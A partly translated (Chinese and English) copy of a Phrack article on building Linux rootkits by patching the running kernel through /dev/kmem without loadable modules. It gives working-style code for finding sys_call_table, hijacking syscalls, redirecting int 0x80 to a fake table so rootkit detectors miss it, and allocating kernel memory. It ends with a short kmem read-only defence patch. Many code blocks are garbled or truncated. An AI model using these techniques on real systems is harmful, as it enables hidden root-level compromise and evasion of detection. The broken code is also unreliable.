Linux on-the-fly kernel patching without LKM

Written by : sd
First published on : Phrack
Translated by : drinkey

   1 – 簡介

   2 – 我們的朋友–/dev/kmem

   3 – 替換核心系統呼叫,sys_call_table[]
     3.1 – 怎樣不用LKM得到 sys_call_table[]
     3.2 – 重定向中斷呼叫 0x80 到 sys_call_table[eax]

   4 – 不用 LKM 的支援來分配核心空間
     4.1 – 使用 LKM支援搜尋 kmalloc()
     4.2 – kmalloc() 的模式搜尋
     4.3 – GFP_KERNEL 的值
     4.4 – 重寫系統呼叫

   5 – 注意事項

   6 – 可能的解決方法

   7 – 結論

   8 – 參考

   9 – 附錄:SucKIT: 成就


首先,我們應該感謝很久以前開發了kernel patching技術的Silvio Cesare,我的大多數想法都是從他那裡竊取的:)


理員很變態,他禁用了那個人修改的sshd,人們最愛的LKM rootkit由於沒有必要的gcc編譯器、庫、標頭檔案,無法編譯。
這裡有一些解決方案,一步一步的講解,文章的最後還有一個全功能的linux-ia32 rootkit,一個例子或者工具,它包含了所有這裡討論的技術。


2、我們的朋友 /dev/kmem




  1. /* 從 kmem 讀資料 */  
  2. static inline int rkm(int fd, int offset, void *buf, int size)  
  3. {  
  4.     if(lseek(fd, offset, 0) != offset) return 0;  
  5.     if(read(fd, buf, size) != size) return 0;  
  6.     return size;  
  7. }  
  9. /* 向 kmem 寫資料 */  
  10. static inline int wkm(int fd, int offset, void *buf, int size)  
  11. {  
  12.         if (lseek(fd, offset, 0) != offset) return 0;  
  13.         if (write(fd, buf, size) != size) return 0;  
  14.         return size;  
  15. }  
  17. /* 從 kmem 讀出一個整數 */  
  18. static inline int rkml(int fd, int offset, ulong *buf)  
  19. {  
  20.         return rkm(fd, offset, buf, sizeof(ulong));  
  21. }  
  23. /* 向 kmem 寫入一個整數 */  
  24. static inline int wkml(int fd, int offset, ulong buf)  
  25. {  
  26.         return wkm(fd, offset, &buf, sizeof(ulong));  
  27. }  
3、替換系統呼叫 sys_call_table[]


  1. /* as everywhere, “Hello world” is good for begginers ? */  
  3. /* 原始的系統呼叫 */  
  4. int (*old_write) (intchar *, int);  
  5.         /* 新的系統呼叫控制程式碼 */  
  6.         new_write(int fd, char *buf, int count) {  
  7.         if (fd == 1) {  /* 標準輸出 */  
  8.                 old_write(fd, “Hello world!
    , 13);  
  9.                 return count;  
  10.         } else {  
  11.                 return old_write(fd, buf, count);  
  12.         }  
  13. }  
  15. old_write = (void *) sys_call_table[__NR_write]; /* 儲存舊的系統呼叫 */  
  16. sys_call_table[__NR_write] = (ulong) new_write;  /* 設立新的系統呼叫 */  
  18. /* Err… there should be better things to do instead fucking up
  19. console with “Hello worlds” ? */  
 這樣的程式碼是大多數 LKM rootkit,tty嗅探劫持程式中經常遇到的,它保證我們可以正確的匯入 sys_call_table[]


3.1 – 怎樣不用LKM得到 sys_call_table[]


據我所知,得到 sys_call_table[] 最準確的方法是用下面程式碼實現:

  1. #include <stdio.h>  
  2. #include <sys/types.h>  
  3. #include <sys/stat.h>  
  4. #inlcude <fcntl.h>  
  6. struct {  
  7.     unsigned short limit;  
  8.     unsigned int base;  
  9. } __attribute__((packed)) idtr;  
  11. struct {  
  12.     unsigned short off1;  
  13.     unsigned short sel;  
  14.     unsigned char none,flags;  
  15.     unsigned short off2;  
  16. } __attribute__((packed)) idt;  
  18. int kmem;  
  19. void readkmem (void *m, unsigned off, int sz)  
  20. {  
  21.     if(lseek(kmem,off,SEEK_SET) != off) {  
  22.         perror(“kmem lseek”);  
  23.         exit(2);  
  24.     }  
  25.     if(read(kmem, m, sz) != sz) {  
  26.         perror(“kmem read”);  
  27.         exit(2);  
  28.     }  
  30. #define CALLOFF 100 /*我們簡要讀取int $0x80的前100位元組*/  
  31. main()  
  32. {  
  33.     unsigned sys_call_off;  
  34.     unsigned sct;  
  35.     char sc_asm[CALLOFF],*p;  
  37.     /*讀取IDTR暫存器的值*/  
  38.     asm (“sidt “%0” : “=m” (idtr)); 
  39.     printf(“idtr base at 0x%X
  41.     /*開啟kmem */ 
  42.     kmem = open (“/dev/kmem“,O_RDONLY); 
  43.     if (kmem < 0) return 1; 
  45.     /*從IDT讀入0x80向量*/ 
  46.     readkmem (&idtr,idtr.base+8*0x80,sizeof(idt)); 
  47.     sys_call_off = (idt.off2 << 16) | idt.off1; 
  48.     printf(“idt80: flags = %X sel = %X off = %X
  49.         (unsigned)idt.flags,(unsigned)idt.sel,sys_call_off); 
  51.     //尋找syscall地址
  52.     readkmem (sc_asm,sys_call_off,CALLOFF); 
  53.     p = (char *)memmem (sc_asm,CALLOFF,”xffx14x85“,3); 
  54.     sct = *(unsigned*)(p+3); 
  55.     if (p){ 
  56.         printf(“sys_call_table at 0x%x, call dispatch at 0x%x
  57.             sct, p);  
  58.     }  
  59.     close(kmem);  
  60. }  
這段程式碼具體是怎麼工作呢?sidt指令向處理器詢問中斷描述符表sidt[asm(“sidt %0” : “=m”

從IDT中我們可以計算出int $0x80的入口點地址為[sys_call_off = (idt.off2 << 16) |
idt.off1;]。好了,我們知道 int $0x80
從哪裡開始,但是那並不是我們最終想要的sys_call_table[]。我們先看看int $0x80

  1. [sd@pikatchu linux]$ gdb -q /usr/src/linux/vmlinux  
  2. (no debugging symbols found)…(gdb) disass system_call  
  3. Dump of assembler code for function system_call:  
  4. 0xc0106bc8 <system_call>:       push   %eax  
  5. 0xc0106bc9 <system_call+1>:     cld  
  6. 0xc0106bca <system_call+2>:     push   %es  
  7. 0xc0106bcb <system_call+3>:     push   %ds  
  8. 0xc0106bcc <system_call+4>:     push   %eax  
  9. 0xc0106bcd <system_call+5>:     push   %ebp  
  10. 0xc0106bce <system_call+6>:     push   %edi  
  11. 0xc0106bcf <system_call+7>:     push   %esi  
  12. 0xc0106bd0 <system_call+8>:     push   %edx  
  13. 0xc0106bd1 <system_call+9>:     push   %ecx  
  14. 0xc0106bd2 <system_call+10>:    push   %ebx  
  15. 0xc0106bd3 <system_call+11>:    mov    $0x18,%edx  
  16. 0xc0106bd8 <system_call+16>:    mov    %edx,%ds  
  17. 0xc0106bda <system_call+18>:    mov    %edx,%es  
  18. 0xc0106bdc <system_call+20>:    mov    $0xffffe000,%ebx  
  19. 0xc0106be1 <system_call+25>:    and    %esp,%ebx  
  20. 0xc0106be3 <system_call+27>:    cmp    $0x100,%eax  
  21. 0xc0106be8 <system_call+32>:    jae    0xc0106c75 <badsys>  
  22. 0xc0106bee <system_call+38>:    testb  $0x2,0x18(%ebx)  
  23. 0xc0106bf2 <system_call+42>:    jne    0xc0106c48 <tracesys>  
  24. 0xc0106bf4 <system_call+44>:    call   *0xc01e0f18(,%eax,4) <– 就是它  
  25. 0xc0106bfb <system_call+51>:    mov    %eax,0x18(%esp,1)  
  26. 0xc0106bff <system_call+55>:    nop  
  27. End of assembler dump.  
  28. (gdb) print &sys_call_table  
  29. $1 = (<data variable, no debug info> *) 0xc01e0f18      <– 看到了?一樣的  
  30. (gdb) x/xw (system_call+44)  
  31. 0xc0106bf4 <system_call+44>:    0x188514ff <– 機器指令(little endian)  
  32. (gdb)  
簡單來說,就是隻要找到鄰近int $0x80入口點sys_call的call
種搜尋對`call <something>(,eax,4)`這種模式相對比較安全。

opcode = 0xff 0x14 0x85 0x<address_of_table>

[memmem (sc_asm,CALLOFF,”xffx14x85″,3);]

其實還有更強壯的處理方式。這裡我們只是簡單的重定向整個IDT中的int $0x80控制程式碼到我們的假控制程式碼,並攔截某些有趣的呼叫。但是如果我們考慮過載就會變得有些複雜了。


  1. readkmem(&old_write, sct + __NR_write * 4, 4); /*儲存舊的系統呼叫*/  
  2. writekmem(new_write, sct + __NR_write * 4, 4); /*設定新的系統呼叫*/  
3.2 – 重定向中斷呼叫 0x80 到 sys_call_table[eax]
When writing this article, we found some “rootkit detectors” on
Packetstorm/Freshmeat. They are able to detect the fact that something
is wrong with a LKM/syscalltable/other kernel stuff…fortunately, most
of them are too stupid and can be simply fooled by the the trick
introduced in [6] by SpaceWalker:

        ulong sct = addr of sys_call_table[]
        char *p = ptr to int 0x80`s call sct(,eax,4) – dispatch
        ulong nsct[256] = new syscall table with modified entries

        readkmem(nsct, sct, 1024);      /* read old */
        old_write = nsct[__NR_write];
        nsct[__NR_write] = new_write;
        /* replace dispatch to our new sct */
        writekmem((ulong) p+3, nsct, 4);

        /* Note that this code never can work, because you can`t
           redirect something kernel related to userspace, such as
           sct[] in this case */


We create a copy of the original sys_call_table[] [readkmem(nsct, sct,
1024);], then we will modify entries which we`re interested in
[old_write = nsct[__NR_write]; nsct[__NR_write] = new_write;] and then
change _only_ addr of <something> in the call

0xc0106bf4 <system_call+44>:    call   *0xc01e0f18(,%eax,4)
                                            |__ Here will be address of
                                                _our_ sct[]

LKM detectors (which does not check consistency of int $0x80) won`t see
anything, sys_call_table[] is the same, but int $0x80 uses our
implanted table.
Allocating kernel space without help of LKM support

Next thing that we need is a memory page above the 0xc0000000 (or 0x80000000) address.

The 0xc0000000 value is demarcation point between user and kernel
memory. User processes have not access above the limit. Take into
account that this value is not exact, and may be different, so it is
good idea to figure out the limit on the fly (from int $0x80`s
entrypoint). Well, how to get our page above the limit ? Let`s take a
look how regular kernel LKM support does it

void inter_module_register(const char *im_name, struct module *owner,
                           const void *userdata)
        struct list_head *tmp;
        struct inter_module_entry *ime, *ime_new;

        if (!(ime_new = kmalloc(sizeof(*ime), GFP_KERNEL))) {
                /* Overloaded kernel, not fatal */

As we expected, they used kmalloc(size, GFP_KERNEL) ! But we can`t use kmalloc() yet because:

    * We don`t know the address of kmalloc() [ paragraph 4.1, 4.2 ]
    * We don`t know the value of GFP_KERNEL [ paragraph 4.3 ]
    * We can`t call kmalloc() from user-space [ paragraph 4.4 ]

Searching for kmalloc() using LKM support

If we can use LKM support:

/* kmalloc() lookup */

/* simplest & safest way, but only if LKM support is there */
ulong   get_sym(char *n) {
        struct  kernel_sym      tab[MAX_SYMS];
        int     numsyms;
        int     i;

        numsyms = get_kernel_syms(NULL);
        if (numsyms > MAX_SYMS || numsyms < 0) return 0;
        for (i = 0; i < numsyms; i++) {
                if (!strncmp(n, tab[i].name, strlen(n)))
                        return tab[i].value;
        return 0;

ulong   get_kma(ulong pgoff)
        ret = get_sym(“kmalloc”);
        if (ret) return ret;
        return 0;

We leave this without comments.
Pattern search of kmalloc()

But if LKM is not there, were getting into troubles. The solution is
quite dirty, and not-so-good by the way, but it seem to work. We`ll
walk through kernel`s .text section and look for patterns such as:

        push    GFP_KERNEL <something between 0-0xffff>
        push    size       <something between 0-0x1ffff>
        call    kmalloc

All info will be gathered into a table, sorted and the function called most times will be our kmalloc(), here is code:

/* kmalloc() lookup */
#define RNUM 1024
ulong   get_kma(ulong pgoff)
        struct { uint a,f,cnt; } rtab[RNUM], *t;
        uint            i, a, j, push1, push2;
        uint            found = 0, total = 0;
        uchar           buf[0x10010], *p;
        int             kmem;
        ulong           ret;

        /* uhh, before we try to brute something, attempt to do things
           in the *right* way ;)) */
        ret = get_sym(“kmalloc”);
        if (ret) return ret;

        /* humm, no way ;)) */
        kmem = open(KMEM_FILE, O_RDONLY, 0);
        if (kmem < 0) return 0;
        for (i = (pgoff + 0x100000); i < (pgoff + 0x1000000);
             i += 0x10000) {
                if (!loc_rkm(kmem, buf, i, sizeof(buf))) return 0;
                /* loop over memory block looking for push and calls */
                for (p = buf; p < buf + 0x10000;) {
                        switch (*p++) {
                                case 0x68:
                                        push1 = push2;
                                        push2 = *(unsigned*)p;
                                        p += 4;
                                case 0x6a:
                                        push1 = push2;
                                        push2 = *p++;
                                case 0xe8:
                                        if (push1 && push2 &&
                                            push1 <= 0xffff &&
                                            push2 <= 0x1ffff) break;
                                        push1 = push2 = 0;
                        /* we have push1/push2/call seq; get address */
                        a = *(unsigned *) p + i + (p – buf) + 4;
                        p += 4;
                        /* find in table */
                        for (j = 0, t = rtab; j < found; j++, t++)
                                if (t->a == a && t->f == push1) break;
                        if (j < found)
                                if (found >= RNUM) {
                                        return 0;
                                else {
                                        t->a = a;
                                        t->f = push1;
                                        t->cnt = 1;
                        push1 = push2 = 0;
                } /* for (p = buf; … */
        } /* for (i = (pgoff + 0x100000) …*/
        t = NULL;
        for (j = 0;j < found; j++)  /* find a winner */
                if (!t || rtab[j].cnt > t->cnt) t = rtab+j;
        if (t) return t->a;
        return 0;

The code above is a simple state machine and it doesn`t bother itself
with potentionaly different asm code layout (when you use some exotic
GCC options). It could be extended to understand different code
patterns (see switch statement) and can be made more accurate by
checking GFP value in PUSHes against known patterns (see paragraph

The accuracy of this code is about 80% (i.e. 80% points to kmalloc, 20% to some junk) and seem to work on 2.2.1 => 2.4.13 ok.
The GFP_KERNEL value

Next problem we get while using kmalloc() is the fact that value of
GFP_KERNEL varies between kernel series, but we can get rid of it by
help of uname()

| kernel version | GFP_KERNEL value |
| 1.0.x .. 2.4.5 |     0x3          |
| 2.4.6 .. 2.4.x |     0x1f0        |

Note that there is some troubles with 2.4.7-2.4.9 kernels, which
sometimes crashes due to bad GFP_KERNEL, simply because the table above
is not exact, it only shows values we CAN use.

The code:

#define NEW_GFP         0x1f0
#define OLD_GFP         0x3

/* uname struc */
struct un {
        char    sysname[65];
        char    nodename[65];
        char    release[65];
        char    version[65];
        char    machine[65];
        char    domainname[65];

int     get_gfp()
        struct un s;
        if ((s.release[0] == `2`) && (s.release[2] == `4`) &&
            (s.release[4] >= `6` ||
            (s.release[5] >= `0` && s.release[5] <= `9`))) {
                return NEW_GFP;
        return OLD_GFP;

Overwriting a syscall
As we mentioned above, we can`t call kmalloc() from user-space directly, solution is Silvio`s trick [2] of replacing syscall:

    * Get address of some syscall (IDT -> int 0x80 -> sys_call_table)
    * Create a small routine which will call kmalloc() and return pointer to allocated page
    * Save sizeof(our_routine) bytes of some syscall
    * Overwrite code of some syscall by our routine
    * Call this syscall from userspace thru int $0x80, so our routine
will operate in kernel context and can call kmalloc() for us passing
out the address of allocated memory as return value.
    * Restore code of some syscall with saved bytes (in step 3.)

our_routine may look as something like that:

struct  kma_struc {
        ulong   (*kmalloc) (uint, int);
        int     size;
        int     flags;
        ulong   mem;
} __attribute__ ((packed));

int     our_routine(struct kma_struc *k)
        k->mem = k->kmalloc(k->size, k->flags);
        return 0;

In this case we directly pass needed info to our routine.

Now we have kernel memory, so we can copy our handling routines there,
point entries in fake sys_call_table to them, infiltrate this fake
table into int $0x80 and enjoy the ride ?
What you should take care of
It would be good idea to follow these rules when writing something using this technique:

    * Take care of kernel versions (We mean GFP_KERNEL).
    * Play _only_ with syscalls, _do not_ use any internal kernel
structures including task_struct, if you want to stay portable between
kernel series.
    * SMP may cause some troubles, remember to take care about
reentrantcy and where it is needed, use user-space locks [
src/core.c#ualloc() ]

Possible solutions

Okay, now from the good man`s point of view. You probably would like to
defeat attacks of kids using such annoying toys. Then you should apply
following kmem read-only patch and disable LKM support in your kernel.

<++> kmem-ro.diff
— /usr/src/linux/drivers/char/mem.c   Mon Apr  9 13:19:05 2001
+++ /usr/src/linux/drivers/char/mem.c   Sun Nov  4 15:50:27 2001
@@ -49,6 +51,8 @@
 const char * buf, size_t count, loff_t *ppos)
    ssize_t written;
+       /* disable kmem write */
+       return -EPERM;

  written = 0;
  #if defined(__sparc__) || defined(__mc68000__)

Note that this patch can be source of troubles in conjuction with some
old utilities which depends on /dev/kmem writing ability. That`s
payment for security.

The raw memory I/O devices in linux seems to be pretty powerful.
Attackers (of course, with root privileges) can use them to hide their
actions, steal informations, grant remote access and so on for a long
time without being noticed. As far we know, there is not so big use of
these devices (in the meaning of write access), so it may be good idea
to disable their writing ability.

 [1] Silvio Cesare`s homepage, pretty good info about low-level linux stuff

 [2] Silvio`s article describing run-time kernel patching (

 [3] QuantumG`s homepage, mostly virus related stuff

 [4] “Abuse of the Linux Kernel for Fun and Profit” by halflife
     [Phrack issue 50, article 05]

 [5] “(nearly) Complete Linux Loadable Kernel Modules. The definitive guide
      for hackers, virus coders and system administrators.”

At the end, I (sd) would like to thank to devik for helping me a lot
with this crap, to Reaction for common spelling checks and to anonymous
editor`s friend which proved the quality of article a lot.